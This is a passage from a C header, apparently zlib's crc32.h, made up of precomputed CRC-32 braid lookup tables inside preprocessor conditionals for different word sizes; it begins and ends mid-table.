0x1f4e41e7, 0xf01cf706, 0x1a9a2a64, 0xf5c89c85, 0x03b738ed, 0xece58e0c, 0x0663536e, 0xe931e58f, 0x081fefeb, 0xe74d590a, 0x0dcb8468, 0xe2993289, 0x3a45caf9, 0xd5177c18, 0x3f91a17a, 0xd0c3179b, 0x31ed1dff, 0xdebfab1e, 0x3439767c, 0xdb6bc09d, 0x2d1464f5, 0xc246d214, 0x28c00f76, 0xc792b997, 0x26bcb3f3, 0xc9ee0512, 0x2368d870, 0xcc3a6e91, 0x49a02ed1, 0xa6f29830, 0x4c744552, 0xa326f3b3, 0x4208f9d7, 0xad5a4f36, 0x47dc9254, 0xa88e24b5, 0x5ef180dd, 0xb1a3363c, 0x5b25eb5e, 0xb4775dbf, 0x555957db, 0xba0be13a, 0x508d3c58, 0xbfdf8ab9, 0x670372c9, 0x8851c428, 0x62d7194a, 0x8d85afab, 0x6caba5cf, 0x83f9132e, 0x697fce4c, 0x862d78ad, 0x7052dcc5, 0x9f006a24, 0x7586b746, 0x9ad401a7, 0x7bfa0bc3, 0x94a8bd22, 0x7e2e6040, 0x917cd6a1}, {0x00000000, 0x87a6cb43, 0xd43c90c7, 0x539a5b84, 0x730827cf, 0xf4aeec8c, 0xa734b708, 0x20927c4b, 0xe6104f9e, 0x61b684dd, 0x322cdf59, 0xb58a141a, 0x95186851, 0x12bea312, 0x4124f896, 0xc68233d5, 0x1751997d, 0x90f7523e, 0xc36d09ba, 0x44cbc2f9, 0x6459beb2, 0xe3ff75f1, 0xb0652e75, 0x37c3e536, 0xf141d6e3, 0x76e71da0, 0x257d4624, 0xa2db8d67, 0x8249f12c, 0x05ef3a6f, 0x567561eb, 0xd1d3aaa8, 0x2ea332fa, 0xa905f9b9, 0xfa9fa23d, 0x7d39697e, 0x5dab1535, 0xda0dde76, 0x899785f2, 0x0e314eb1, 0xc8b37d64, 0x4f15b627, 0x1c8feda3, 0x9b2926e0, 0xbbbb5aab, 0x3c1d91e8, 0x6f87ca6c, 0xe821012f, 0x39f2ab87, 0xbe5460c4, 0xedce3b40, 0x6a68f003, 0x4afa8c48, 0xcd5c470b, 0x9ec61c8f, 0x1960d7cc, 0xdfe2e419, 0x58442f5a, 0x0bde74de, 0x8c78bf9d, 0xaceac3d6, 0x2b4c0895, 0x78d65311, 0xff709852, 0x5d4665f4, 0xdae0aeb7, 0x897af533, 0x0edc3e70, 0x2e4e423b, 0xa9e88978, 0xfa72d2fc, 0x7dd419bf, 0xbb562a6a, 0x3cf0e129, 0x6f6abaad, 0xe8cc71ee, 0xc85e0da5, 0x4ff8c6e6, 0x1c629d62, 0x9bc45621, 0x4a17fc89, 0xcdb137ca, 0x9e2b6c4e, 0x198da70d, 0x391fdb46, 0xbeb91005, 0xed234b81, 0x6a8580c2, 0xac07b317, 0x2ba17854, 0x783b23d0, 0xff9de893, 0xdf0f94d8, 0x58a95f9b, 0x0b33041f, 0x8c95cf5c, 0x73e5570e, 0xf4439c4d, 0xa7d9c7c9, 0x207f0c8a, 0x00ed70c1, 0x874bbb82, 0xd4d1e006, 0x53772b45, 0x95f51890, 0x1253d3d3, 0x41c98857, 0xc66f4314, 0xe6fd3f5f, 0x615bf41c, 0x32c1af98, 0xb56764db, 0x64b4ce73, 0xe3120530, 0xb0885eb4, 0x372e95f7, 0x17bce9bc, 0x901a22ff, 0xc380797b, 0x4426b238, 0x82a481ed, 0x05024aae, 0x5698112a, 0xd13eda69, 0xf1aca622, 0x760a6d61, 0x259036e5, 0xa236fda6, 0xba8ccbe8, 0x3d2a00ab, 0x6eb05b2f, 0xe916906c, 0xc984ec27, 0x4e222764, 0x1db87ce0, 0x9a1eb7a3, 0x5c9c8476, 0xdb3a4f35, 0x88a014b1, 0x0f06dff2, 0x2f94a3b9, 0xa83268fa, 0xfba8337e, 0x7c0ef83d, 0xaddd5295, 0x2a7b99d6, 0x79e1c252, 0xfe470911, 0xded5755a, 0x5973be19, 0x0ae9e59d, 0x8d4f2ede, 0x4bcd1d0b, 0xcc6bd648, 0x9ff18dcc, 0x1857468f, 0x38c53ac4, 0xbf63f187, 0xecf9aa03, 0x6b5f6140, 0x942ff912, 0x13893251, 0x401369d5, 0xc7b5a296, 0xe727dedd, 0x6081159e, 0x331b4e1a, 0xb4bd8559, 0x723fb68c, 0xf5997dcf, 0xa603264b, 0x21a5ed08, 0x01379143, 0x86915a00, 0xd50b0184, 0x52adcac7, 0x837e606f, 0x04d8ab2c, 0x5742f0a8, 0xd0e43beb, 0xf07647a0, 0x77d08ce3, 0x244ad767, 0xa3ec1c24, 0x656e2ff1, 0xe2c8e4b2, 0xb152bf36, 0x36f47475, 0x1666083e, 0x91c0c37d, 0xc25a98f9, 0x45fc53ba, 0xe7caae1c, 0x606c655f, 0x33f63edb, 0xb450f598, 0x94c289d3, 0x13644290, 0x40fe1914, 0xc758d257, 0x01dae182, 0x867c2ac1, 0xd5e67145, 0x5240ba06, 0x72d2c64d, 0xf5740d0e, 0xa6ee568a, 0x21489dc9, 0xf09b3761, 0x773dfc22, 0x24a7a7a6, 0xa3016ce5, 0x839310ae, 0x0435dbed, 0x57af8069, 0xd0094b2a, 0x168b78ff, 0x912db3bc, 0xc2b7e838, 0x4511237b, 0x65835f30, 0xe2259473, 0xb1bfcff7, 0x361904b4, 0xc9699ce6, 0x4ecf57a5, 0x1d550c21, 0x9af3c762, 0xba61bb29, 0x3dc7706a, 0x6e5d2bee, 0xe9fbe0ad, 0x2f79d378, 0xa8df183b, 0xfb4543bf, 0x7ce388fc, 0x5c71f4b7, 0xdbd73ff4, 0x884d6470, 0x0febaf33, 0xde38059b, 0x599eced8, 0x0a04955c, 0x8da25e1f, 0xad302254, 0x2a96e917, 0x790cb293, 0xfeaa79d0, 0x38284a05, 0xbf8e8146, 0xec14dac2, 0x6bb21181, 0x4b206dca, 0xcc86a689, 0x9f1cfd0d, 0x18ba364e}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x43cba687, 0xc7903cd4, 0x845b9a53, 0xcf270873, 0x8cecaef4, 0x08b734a7, 0x4b7c9220, 0x9e4f10e6, 0xdd84b661, 0x59df2c32, 0x1a148ab5, 0x51681895, 0x12a3be12, 0x96f82441, 0xd53382c6, 0x7d995117, 0x3e52f790, 0xba096dc3, 0xf9c2cb44, 0xb2be5964, 0xf175ffe3, 0x752e65b0, 0x36e5c337, 0xe3d641f1, 0xa01de776, 0x24467d25, 0x678ddba2, 0x2cf14982, 0x6f3aef05, 0xeb617556, 0xa8aad3d1, 0xfa32a32e, 0xb9f905a9, 0x3da29ffa, 0x7e69397d, 0x3515ab5d, 0x76de0dda, 0xf2859789, 0xb14e310e, 0x647db3c8, 0x27b6154f, 0xa3ed8f1c, 0xe026299b, 0xab5abbbb, 0xe8911d3c, 0x6cca876f, 0x2f0121e8, 0x87abf239, 0xc46054be, 0x403bceed, 0x03f0686a, 0x488cfa4a, 0x0b475ccd, 0x8f1cc69e, 0xccd76019, 0x19e4e2df, 0x5a2f4458, 0xde74de0b, 0x9dbf788c, 0xd6c3eaac, 0x95084c2b, 0x1153d678, 0x529870ff, 0xf465465d, 0xb7aee0da, 0x33f57a89, 0x703edc0e, 0x3b424e2e, 0x7889e8a9, 0xfcd272fa, 0xbf19d47d, 0x6a2a56bb, 0x29e1f03c, 0xadba6a6f, 0xee71cce8, 0xa50d5ec8, 0xe6c6f84f, 0x629d621c, 0x2156c49b, 0x89fc174a, 0xca37b1cd, 0x4e6c2b9e, 0x0da78d19, 0x46db1f39, 0x0510b9be, 0x814b23ed, 0xc280856a, 0x17b307ac, 0x5478a12b, 0xd0233b78, 0x93e89dff, 0xd8940fdf, 0x9b5fa958, 0x1f04330b, 0x5ccf958c, 0x0e57e573, 0x4d9c43f4, 0xc9c7d9a7, 0x8a0c7f20, 0xc170ed00, 0x82bb4b87, 0x06e0d1d4, 0x452b7753, 0x9018f595, 0xd3d35312, 0x5788c941, 0x14436fc6, 0x5f3ffde6, 0x1cf45b61, 0x98afc132, 0xdb6467b5, 0x73ceb464, 0x300512e3, 0xb45e88b0, 0xf7952e37, 0xbce9bc17, 0xff221a90, 0x7b7980c3, 0x38b22644, 0xed81a482, 0xae4a0205, 0x2a119856, 0x69da3ed1, 0x22a6acf1, 0x616d0a76, 0xe5369025, 0xa6fd36a2, 0xe8cb8cba, 0xab002a3d, 0x2f5bb06e, 0x6c9016e9, 0x27ec84c9, 0x6427224e, 0xe07cb81d, 0xa3b71e9a, 0x76849c5c, 0x354f3adb, 0xb114a088, 0xf2df060f, 0xb9a3942f, 0xfa6832a8, 0x7e33a8fb, 0x3df80e7c, 0x9552ddad, 0xd6997b2a, 0x52c2e179, 0x110947fe, 0x5a75d5de, 0x19be7359, 0x9de5e90a, 0xde2e4f8d, 0x0b1dcd4b, 0x48d66bcc, 0xcc8df19f, 0x8f465718, 0xc43ac538, 0x87f163bf, 0x03aaf9ec, 0x40615f6b, 0x12f92f94, 0x51328913, 0xd5691340, 0x96a2b5c7, 0xddde27e7, 0x9e158160, 0x1a4e1b33, 0x5985bdb4, 0x8cb63f72, 0xcf7d99f5, 0x4b2603a6, 0x08eda521, 0x43913701, 0x005a9186, 0x84010bd5, 0xc7caad52, 0x6f607e83, 0x2cabd804, 0xa8f04257, 0xeb3be4d0, 0xa04776f0, 0xe38cd077, 0x67d74a24, 0x241ceca3, 0xf12f6e65, 0xb2e4c8e2, 0x36bf52b1, 0x7574f436, 0x3e086616, 0x7dc3c091, 0xf9985ac2, 0xba53fc45, 0x1caecae7, 0x5f656c60, 0xdb3ef633, 0x98f550b4, 0xd389c294, 0x90426413, 0x1419fe40, 0x57d258c7, 0x82e1da01, 0xc12a7c86, 0x4571e6d5, 0x06ba4052, 0x4dc6d272, 0x0e0d74f5, 0x8a56eea6, 0xc99d4821, 0x61379bf0, 0x22fc3d77, 0xa6a7a724, 0xe56c01a3, 0xae109383, 0xeddb3504, 0x6980af57, 0x2a4b09d0, 0xff788b16, 0xbcb32d91, 0x38e8b7c2, 0x7b231145, 0x305f8365, 0x739425e2, 0xf7cfbfb1, 0xb4041936, 0xe69c69c9, 0xa557cf4e, 0x210c551d, 0x62c7f39a, 0x29bb61ba, 0x6a70c73d, 0xee2b5d6e, 0xade0fbe9, 0x78d3792f, 0x3b18dfa8, 0xbf4345fb, 0xfc88e37c, 0xb7f4715c, 0xf43fd7db, 0x70644d88, 0x33afeb0f, 0x9b0538de, 0xd8ce9e59, 0x5c95040a, 0x1f5ea28d, 0x542230ad, 0x17e9962a, 0x93b20c79, 0xd079aafe, 0x054a2838, 0x46818ebf, 0xc2da14ec, 0x8111b26b, 0xca6d204b, 0x89a686cc, 0x0dfd1c9f, 0x4e36ba18}, {0x00000000, 0xe1b652ef, 0x836bd405, 0x62dd86ea, 0x06d7a80b, 0xe761fae4, 0x85bc7c0e, 0x640a2ee1, 0x0cae5117, 0xed1803f8, 0x8fc58512, 0x6e73d7fd, 0x0a79f91c, 0xebcfabf3, 0x89122d19, 0x68a47ff6, 0x185ca32e, 0xf9eaf1c1, 0x9b37772b, 0x7a8125c4, 0x1e8b0b25, 0xff3d59ca, 0x9de0df20, 0x7c568dcf, 0x14f2f239, 0xf544a0d6, 0x9799263c, 0x762f74d3, 0x12255a32, 0xf39308dd, 0x914e8e37, 0x70f8dcd8, 0x30b8465d, 0xd10e14b2, 0xb3d39258, 0x5265c0b7, 0x366fee56, 0xd7d9bcb9, 0xb5043a53, 0x54b268bc, 0x3c16174a, 0xdda045a5, 0xbf7dc34f, 0x5ecb91a0, 0x3ac1bf41, 0xdb77edae, 0xb9aa6b44, 0x581c39ab, 0x28e4e573, 0xc952b79c, 0xab8f3176, 0x4a396399, 0x2e334d78, 0xcf851f97, 0xad58997d, 0x4ceecb92, 0x244ab464, 0xc5fce68b, 0xa7216061, 0x4697328e, 0x229d1c6f, 0xc32b4e80, 0xa1f6c86a, 0x40409a85, 0x60708dba, 0x81c6df55, 0xe31b59bf, 0x02ad0b50, 0x66a725b1, 0x8711775e, 0xe5ccf1b4, 0x047aa35b, 0x6cdedcad, 0x8d688e42, 0xefb508a8, 0x0e035a47, 0x6a0974a6, 0x8bbf2649, 0xe962a0a3, 0x08d4f24c, 0x782c2e94, 0x999a7c7b, 0xfb47fa91, 0x1af1a87e, 0x7efb869f, 0x9f4dd470, 0xfd90529a, 0x1c260075, 0x74827f83, 0x95342d6c, 0xf7e9ab86, 0x165ff969, 0x7255d788, 0x93e38567, 0xf13e038d, 0x10885162, 0x50c8cbe7, 0xb17e9908, 0xd3a31fe2, 0x32154d0d, 0x561f63ec, 0xb7a93103, 0xd574b7e9, 0x34c2e506, 0x5c669af0, 0xbdd0c81f, 0xdf0d4ef5, 0x3ebb1c1a, 0x5ab132fb, 0xbb076014, 0xd9dae6fe, 0x386cb411, 0x489468c9, 0xa9223a26, 0xcbffbccc, 0x2a49ee23, 0x4e43c0c2, 0xaff5922d, 0xcd2814c7, 0x2c9e4628, 0x443a39de, 0xa58c6b31, 0xc751eddb, 0x26e7bf34, 0x42ed91d5, 0xa35bc33a, 0xc18645d0, 0x2030173f, 0x81e66bae, 0x60503941, 0x028dbfab, 0xe33bed44, 0x8731c3a5, 0x6687914a, 0x045a17a0, 0xe5ec454f, 0x8d483ab9, 0x6cfe6856, 0x0e23eebc, 0xef95bc53, 0x8b9f92b2, 0x6a29c05d, 0x08f446b7, 0xe9421458, 0x99bac880, 0x780c9a6f, 0x1ad11c85, 0xfb674e6a, 0x9f6d608b, 0x7edb3264, 0x1c06b48e, 0xfdb0e661, 0x95149997, 0x74a2cb78, 0x167f4d92, 0xf7c91f7d, 0x93c3319c, 0x72756373, 0x10a8e599, 0xf11eb776, 0xb15e2df3, 0x50e87f1c, 0x3235f9f6, 0xd383ab19, 0xb78985f8, 0x563fd717, 0x34e251fd, 0xd5540312, 0xbdf07ce4, 0x5c462e0b, 0x3e9ba8e1, 0xdf2dfa0e, 0xbb27d4ef, 0x5a918600, 0x384c00ea, 0xd9fa5205, 0xa9028edd, 0x48b4dc32, 0x2a695ad8, 0xcbdf0837, 0xafd526d6, 0x4e637439, 0x2cbef2d3, 0xcd08a03c, 0xa5acdfca, 0x441a8d25, 0x26c70bcf, 0xc7715920, 0xa37b77c1, 0x42cd252e, 0x2010a3c4, 0xc1a6f12b, 0xe196e614, 0x0020b4fb, 0x62fd3211, 0x834b60fe, 0xe7414e1f, 0x06f71cf0, 0x642a9a1a, 0x859cc8f5, 0xed38b703, 0x0c8ee5ec, 0x6e536306, 0x8fe531e9, 0xebef1f08, 0x0a594de7, 0x6884cb0d, 0x893299e2, 0xf9ca453a, 0x187c17d5, 0x7aa1913f, 0x9b17c3d0, 0xff1ded31, 0x1eabbfde, 0x7c763934, 0x9dc06bdb, 0xf564142d, 0x14d246c2, 0x760fc028, 0x97b992c7, 0xf3b3bc26, 0x1205eec9, 0x70d86823, 0x916e3acc, 0xd12ea049, 0x3098f2a6, 0x5245744c, 0xb3f326a3, 0xd7f90842, 0x364f5aad, 0x5492dc47, 0xb5248ea8, 0xdd80f15e, 0x3c36a3b1, 0x5eeb255b, 0xbf5d77b4, 0xdb575955, 0x3ae10bba, 0x583c8d50, 0xb98adfbf, 0xc9720367, 0x28c45188, 0x4a19d762, 0xabaf858d, 0xcfa5ab6c, 0x2e13f983, 0x4cce7f69, 0xad782d86, 0xc5dc5270, 0x246a009f, 0x46b78675, 0xa701d49a, 0xc30bfa7b, 0x22bda894, 0x40602e7e, 0xa1d67c91}, {0x00000000, 0x5880e2d7, 0xf106b474, 0xa98656a3, 0xe20d68e9, 0xba8d8a3e, 0x130bdc9d, 0x4b8b3e4a, 0x851da109, 0xdd9d43de, 0x741b157d, 0x2c9bf7aa, 0x6710c9e0, 0x3f902b37, 0x96167d94, 0xce969f43, 0x0a3b4213, 0x52bba0c4, 0xfb3df667, 0xa3bd14b0, 0xe8362afa, 0xb0b6c82d, 0x19309e8e, 0x41b07c59, 0x8f26e31a, 0xd7a601cd, 0x7e20576e, 0x26a0b5b9, 0x6d2b8bf3, 0x35ab6924, 0x9c2d3f87, 0xc4addd50, 0x14768426, 0x4cf666f1, 0xe5703052, 0xbdf0d285, 0xf67beccf, 0xaefb0e18, 0x077d58bb, 0x5ffdba6c, 0x916b252f, 0xc9ebc7f8, 0x606d915b, 0x38ed738c, 0x73664dc6, 0x2be6af11, 0x8260f9b2, 0xdae01b65, 0x1e4dc635, 0x46cd24e2, 0xef4b7241, 0xb7cb9096, 0xfc40aedc, 0xa4c04c0b, 0x0d461aa8, 0x55c6f87f, 0x9b50673c, 0xc3d085eb, 0x6a56d348, 0x32d6319f, 0x795d0fd5, 0x21dded02, 0x885bbba1, 0xd0db5976, 0x28ec084d, 0x706cea9a, 0xd9eabc39, 0x816a5eee, 0xcae160a4, 0x92618273, 0x3be7d4d0, 0x63673607, 0xadf1a944, 0xf5714b93, 0x5cf71d30, 0x0477ffe7, 0x4ffcc1ad, 0x177c237a, 0xbefa75d9, 0xe67a970e, 0x22d74a5e, 0x7a57a889, 0xd3d1fe2a, 0x8b511cfd, 0xc0da22b7, 0x985ac060, 0x31dc96c3, 0x695c7414, 0xa7caeb57, 0xff4a0980, 0x56cc5f23, 0x0e4cbdf4, 0x45c783be, 0x1d476169, 0xb4c137ca, 0xec41d51d, 0x3c9a8c6b, 0x641a6ebc, 0xcd9c381f, 0x951cdac8, 0xde97e482, 0x86170655, 0x2f9150f6, 0x7711b221, 0xb9872d62, 0xe107cfb5, 0x48819916, 0x10017bc1, 0x5b8a458b, 0x030aa75c, 0xaa8cf1ff, 0xf20c1328, 0x36a1ce78, 0x6e212caf, 0xc7a77a0c, 0x9f2798db, 0xd4aca691, 0x8c2c4446, 0x25aa12e5, 0x7d2af032, 0xb3bc6f71, 0xeb3c8da6, 0x42badb05, 0x1a3a39d2, 0x51b10798, 0x0931e54f, 0xa0b7b3ec, 0xf837513b, 0x50d8119a, 0x0858f34d, 0xa1dea5ee, 0xf95e4739, 0xb2d57973, 0xea559ba4, 0x43d3cd07, 0x1b532fd0, 0xd5c5b093, 0x8d455244, 0x24c304e7, 0x7c43e630, 0x37c8d87a, 0x6f483aad, 0xc6ce6c0e, 0x9e4e8ed9, 0x5ae35389, 0x0263b15e, 0xabe5e7fd, 0xf365052a, 0xb8ee3b60, 0xe06ed9b7, 0x49e88f14, 0x11686dc3, 0xdffef280, 0x877e1057, 0x2ef846f4, 0x7678a423, 0x3df39a69, 0x657378be, 0xccf52e1d, 0x9475ccca, 0x44ae95bc, 0x1c2e776b, 0xb5a821c8, 0xed28c31f, 0xa6a3fd55, 0xfe231f82, 0x57a54921, 0x0f25abf6, 0xc1b334b5, 0x9933d662, 0x30b580c1, 0x68356216, 0x23be5c5c, 0x7b3ebe8b, 0xd2b8e828, 0x8a380aff, 0x4e95d7af, 0x16153578, 0xbf9363db, 0xe713810c, 0xac98bf46, 0xf4185d91, 0x5d9e0b32, 0x051ee9e5, 0xcb8876a6, 0x93089471, 0x3a8ec2d2, 0x620e2005, 0x29851e4f, 0x7105fc98, 0xd883aa3b, 0x800348ec, 0x783419d7, 0x20b4fb00, 0x8932ada3, 0xd1b24f74, 0x9a39713e, 0xc2b993e9, 0x6b3fc54a, 0x33bf279d, 0xfd29b8de, 0xa5a95a09, 0x0c2f0caa, 0x54afee7d, 0x1f24d037, 0x47a432e0, 0xee226443, 0xb6a28694, 0x720f5bc4, 0x2a8fb913, 0x8309efb0, 0xdb890d67, 0x9002332d, 0xc882d1fa, 0x61048759, 0x3984658e, 0xf712facd, 0xaf92181a, 0x06144eb9, 0x5e94ac6e, 0x151f9224, 0x4d9f70f3, 0xe4192650, 0xbc99c487, 0x6c429df1, 0x34c27f26, 0x9d442985, 0xc5c4cb52, 0x8e4ff518, 0xd6cf17cf, 0x7f49416c, 0x27c9a3bb, 0xe95f3cf8, 0xb1dfde2f, 0x1859888c, 0x40d96a5b, 0x0b525411, 0x53d2b6c6, 0xfa54e065, 0xa2d402b2, 0x6679dfe2, 0x3ef93d35, 0x977f6b96, 0xcfff8941, 0x8474b70b, 0xdcf455dc, 0x7572037f, 0x2df2e1a8, 0xe3647eeb, 0xbbe49c3c, 0x1262ca9f, 0x4ae22848, 0x01691602, 0x59e9f4d5, 0xf06fa276, 0xa8ef40a1}, {0x00000000, 0x463b6765, 0x8c76ceca, 0xca4da9af, 0x59ebed4e, 0x1fd08a2b, 0xd59d2384, 0x93a644e1, 0xb2d6db9d, 0xf4edbcf8, 0x3ea01557, 0x789b7232, 0xeb3d36d3, 0xad0651b6, 0x674bf819, 0x21709f7c, 0x25abc6e0, 0x6390a185, 0xa9dd082a, 0xefe66f4f, 0x7c402bae, 0x3a7b4ccb, 0xf036e564, 0xb60d8201, 0x977d1d7d, 0xd1467a18, 0x1b0bd3b7, 0x5d30b4d2, 0xce96f033, 0x88ad9756, 0x42e03ef9, 0x04db599c, 0x0b50fc1a, 0x4d6b9b7f, 0x872632d0, 0xc11d55b5, 0x52bb1154, 0x14807631, 0xdecddf9e, 0x98f6b8fb, 0xb9862787, 0xffbd40e2, 0x35f0e94d, 0x73cb8e28, 0xe06dcac9, 0xa656adac, 0x6c1b0403, 0x2a206366, 0x2efb3afa, 0x68c05d9f, 0xa28df430, 0xe4b69355, 0x7710d7b4, 0x312bb0d1, 0xfb66197e, 0xbd5d7e1b, 0x9c2de167, 0xda168602, 0x105b2fad, 0x566048c8, 0xc5c60c29, 0x83fd6b4c, 0x49b0c2e3, 0x0f8ba586, 0x16a0f835, 0x509b9f50, 0x9ad636ff, 0xdced519a, 0x4f4b157b, 0x0970721e, 0xc33ddbb1, 0x8506bcd4, 0xa47623a8, 0xe24d44cd, 0x2800ed62, 0x6e3b8a07, 0xfd9dcee6, 0xbba6a983, 0x71eb002c, 0x37d06749, 0x330b3ed5, 0x753059b0, 0xbf7df01f, 0xf946977a, 0x6ae0d39b, 0x2cdbb4fe, 0xe6961d51, 0xa0ad7a34, 0x81dde548, 0xc7e6822d, 0x0dab2b82, 0x4b904ce7, 0xd8360806, 0x9e0d6f63, 0x5440c6cc, 0x127ba1a9, 0x1df0042f, 0x5bcb634a, 0x9186cae5, 0xd7bdad80, 0x441be961, 0x02208e04, 0xc86d27ab, 0x8e5640ce, 0xaf26dfb2, 0xe91db8d7, 0x23501178, 0x656b761d, 0xf6cd32fc, 0xb0f65599, 0x7abbfc36, 0x3c809b53, 0x385bc2cf, 0x7e60a5aa, 0xb42d0c05, 0xf2166b60, 0x61b02f81, 0x278b48e4, 0xedc6e14b, 0xabfd862e, 0x8a8d1952, 0xccb67e37, 0x06fbd798, 0x40c0b0fd, 0xd366f41c, 0x955d9379, 0x5f103ad6, 0x192b5db3, 0x2c40f16b, 0x6a7b960e, 0xa0363fa1, 0xe60d58c4, 0x75ab1c25, 0x33907b40, 0xf9ddd2ef, 0xbfe6b58a, 0x9e962af6, 0xd8ad4d93, 0x12e0e43c, 0x54db8359, 0xc77dc7b8, 0x8146a0dd, 0x4b0b0972, 0x0d306e17, 0x09eb378b, 0x4fd050ee, 0x859df941, 0xc3a69e24, 0x5000dac5, 0x163bbda0, 0xdc76140f, 0x9a4d736a, 0xbb3dec16, 0xfd068b73, 0x374b22dc, 0x717045b9, 0xe2d60158, 0xa4ed663d, 0x6ea0cf92, 0x289ba8f7, 0x27100d71, 0x612b6a14, 0xab66c3bb, 0xed5da4de, 0x7efbe03f, 0x38c0875a, 0xf28d2ef5, 0xb4b64990, 0x95c6d6ec, 0xd3fdb189, 0x19b01826, 0x5f8b7f43, 0xcc2d3ba2, 0x8a165cc7, 0x405bf568, 0x0660920d, 0x02bbcb91, 0x4480acf4, 0x8ecd055b, 0xc8f6623e, 0x5b5026df, 0x1d6b41ba, 0xd726e815, 0x911d8f70, 0xb06d100c, 0xf6567769, 0x3c1bdec6, 0x7a20b9a3, 0xe986fd42, 0xafbd9a27, 0x65f03388, 0x23cb54ed, 0x3ae0095e, 0x7cdb6e3b, 0xb696c794, 0xf0ada0f1, 0x630be410, 0x25308375, 0xef7d2ada, 0xa9464dbf, 0x8836d2c3, 0xce0db5a6, 0x04401c09, 0x427b7b6c, 0xd1dd3f8d, 0x97e658e8, 0x5dabf147, 0x1b909622, 0x1f4bcfbe, 0x5970a8db, 0x933d0174, 0xd5066611, 0x46a022f0, 0x009b4595, 0xcad6ec3a, 0x8ced8b5f, 0xad9d1423, 0xeba67346, 0x21ebdae9, 0x67d0bd8c, 0xf476f96d, 0xb24d9e08, 0x780037a7, 0x3e3b50c2, 0x31b0f544, 0x778b9221, 0xbdc63b8e, 0xfbfd5ceb, 0x685b180a, 0x2e607f6f, 0xe42dd6c0, 0xa216b1a5, 0x83662ed9, 0xc55d49bc, 0x0f10e013, 0x492b8776, 0xda8dc397, 0x9cb6a4f2, 0x56fb0d5d, 0x10c06a38, 0x141b33a4, 0x522054c1, 0x986dfd6e, 0xde569a0b, 0x4df0deea, 0x0bcbb98f, 0xc1861020, 0x87bd7745, 0xa6cde839, 0xe0f68f5c, 0x2abb26f3, 0x6c804196, 0xff260577, 0xb91d6212, 0x7350cbbd, 0x356bacd8}}; #endif #endif #if N == 6 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x3db1ecdc, 0x7b63d9b8, 0x46d23564, 0xf6c7b370, 0xcb765fac, 0x8da46ac8, 0xb0158614, 0x36fe60a1, 0x0b4f8c7d, 0x4d9db919, 0x702c55c5, 0xc039d3d1, 0xfd883f0d, 0xbb5a0a69, 0x86ebe6b5, 0x6dfcc142, 0x504d2d9e, 0x169f18fa, 0x2b2ef426, 0x9b3b7232, 0xa68a9eee, 0xe058ab8a, 0xdde94756, 0x5b02a1e3, 0x66b34d3f, 0x2061785b, 0x1dd09487, 0xadc51293, 0x9074fe4f, 0xd6a6cb2b, 0xeb1727f7, 0xdbf98284, 0xe6486e58, 0xa09a5b3c, 0x9d2bb7e0, 0x2d3e31f4, 0x108fdd28, 0x565de84c, 0x6bec0490, 0xed07e225, 0xd0b60ef9, 0x96643b9d, 0xabd5d741, 0x1bc05155, 0x2671bd89, 0x60a388ed, 0x5d126431, 0xb60543c6, 0x8bb4af1a, 0xcd669a7e, 0xf0d776a2, 0x40c2f0b6, 0x7d731c6a, 0x3ba1290e, 0x0610c5d2, 0x80fb2367, 0xbd4acfbb, 0xfb98fadf, 0xc6291603, 0x763c9017, 0x4b8d7ccb, 0x0d5f49af, 0x30eea573, 0x6c820349, 0x5133ef95, 0x17e1daf1, 0x2a50362d, 0x9a45b039, 0xa7f45ce5, 0xe1266981, 0xdc97855d, 0x5a7c63e8, 0x67cd8f34, 0x211fba50, 0x1cae568c, 0xacbbd098, 0x910a3c44, 0xd7d80920, 0xea69e5fc, 0x017ec20b, 0x3ccf2ed7, 0x7a1d1bb3, 0x47acf76f, 0xf7b9717b, 0xca089da7, 0x8cdaa8c3, 0xb16b441f, 0x3780a2aa, 0x0a314e76, 0x4ce37b12, 0x715297ce, 0xc14711da, 0xfcf6fd06, 0xba24c862, 0x879524be, 0xb77b81cd, 0x8aca6d11, 0xcc185875, 0xf1a9b4a9, 0x41bc32bd, 0x7c0dde61, 0x3adfeb05, 0x076e07d9, 0x8185e16c, 0xbc340db0, 0xfae638d4, 0xc757d408, 0x7742521c, 0x4af3bec0, 0x0c218ba4, 0x31906778, 0xda87408f, 0xe736ac53, 0xa1e49937, 0x9c5575eb, 0x2c40f3ff, 0x11f11f23, 0x57232a47, 0x6a92c69b, 0xec79202e, 0xd1c8ccf2, 0x971af996, 0xaaab154a, 0x1abe935e, 0x270f7f82, 0x61dd4ae6, 0x5c6ca63a, 0xd9040692, 0xe4b5ea4e, 0xa267df2a, 0x9fd633f6, 0x2fc3b5e2, 0x1272593e, 0x54a06c5a, 0x69118086, 0xeffa6633, 0xd24b8aef, 0x9499bf8b, 0xa9285357, 0x193dd543, 0x248c399f, 0x625e0cfb, 0x5fefe027, 0xb4f8c7d0, 0x89492b0c, 0xcf9b1e68, 0xf22af2b4, 0x423f74a0, 0x7f8e987c, 0x395cad18, 0x04ed41c4, 0x8206a771, 0xbfb74bad, 0xf9657ec9, 0xc4d49215, 0x74c11401, 0x4970f8dd, 0x0fa2cdb9, 0x32132165, 0x02fd8416, 0x3f4c68ca, 0x799e5dae, 0x442fb172, 0xf43a3766, 0xc98bdbba, 0x8f59eede, 0xb2e80202, 0x3403e4b7, 0x09b2086b, 0x4f603d0f, 0x72d1d1d3, 0xc2c457c7, 0xff75bb1b, 0xb9a78e7f, 0x841662a3, 0x6f014554, 0x52b0a988, 0x14629cec, 0x29d37030, 0x99c6f624, 0xa4771af8, 0xe2a52f9c, 0xdf14c340, 0x59ff25f5, 0x644ec929, 0x229cfc4d, 0x1f2d1091, 0xaf389685, 0x92897a59, 0xd45b4f3d, 0xe9eaa3e1, 0xb58605db, 0x8837e907, 0xcee5dc63, 0xf35430bf, 0x4341b6ab, 0x7ef05a77, 0x38226f13, 0x059383cf, 0x8378657a, 0xbec989a6, 0xf81bbcc2, 0xc5aa501e, 0x75bfd60a, 0x480e3ad6, 0x0edc0fb2, 0x336de36e, 0xd87ac499, 0xe5cb2845, 0xa3191d21, 0x9ea8f1fd, 0x2ebd77e9, 0x130c9b35, 0x55deae51, 0x686f428d, 0xee84a438, 0xd33548e4, 0x95e77d80, 0xa856915c, 0x18431748, 0x25f2fb94, 0x6320cef0, 0x5e91222c, 0x6e7f875f, 0x53ce6b83, 0x151c5ee7, 0x28adb23b, 0x98b8342f, 0xa509d8f3, 0xe3dbed97, 0xde6a014b, 0x5881e7fe, 0x65300b22, 0x23e23e46, 0x1e53d29a, 0xae46548e, 0x93f7b852, 0xd5258d36, 0xe89461ea, 0x0383461d, 0x3e32aac1, 